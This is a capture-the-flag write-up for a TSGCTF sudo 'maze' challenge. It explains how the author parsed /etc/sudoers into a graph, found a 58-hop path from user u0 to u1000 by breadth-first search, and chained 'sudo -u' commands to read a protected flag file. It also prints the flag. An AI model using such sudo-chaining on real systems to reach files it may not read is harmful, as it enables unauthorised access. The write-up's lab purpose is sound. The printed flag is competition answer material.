Search for a command to run...
Where am I? Who am I?
When we connect to the challenge, we get dropped into a shell as user u0. The goal is simple: read the flag at /home/user/flag.txt, but there the file is owned by user u1000 with permissions 0400 (only the owner can read it).
The "maze" part comes from /etc/sudoers, it defines which users can sudo to which other users. Each user is like a node in a graph, and the sudo permissions are the edges. We need to find a path from u0 to u1000 by chaining sudo commands.
The challenge description mentions that the path was "computed from the shipped sudoers", but how do you actually discover it? There are two main approaches:
Since we had access to the sudoers file, we used an algorithmic approach:
Parse the sudoers file to build a graph representation:
u123 ALL=(u456, u789) NOPASSWD: ALL means u123 can sudo to u456 and u789)u0 ALL=(u499) NOPASSWD: ALL, meaning u0 can sudo to u499Use graph traversal to find the path:
u0 to u1000u0, explores all users it can sudo to, then explores all users those users can sudo to, and so on until it reaches u1000Build the sudo command chain:
The discovered path has 58 hops: u0 β u499 β u977 β u835 β u4 β u298 β ... β u1000
After discovering the path, we appends cat /home/user/flag.txt and do:
sudo -u u499 sudo -u u977 sudo -u u835 ... sudo -u u1000 cat /home/user/flag.txt
It traverses all 58 user hops and we become u1000, which allows us to read the flag:
TSGCTF{Soooooooooooooo_many_users_in_this_server}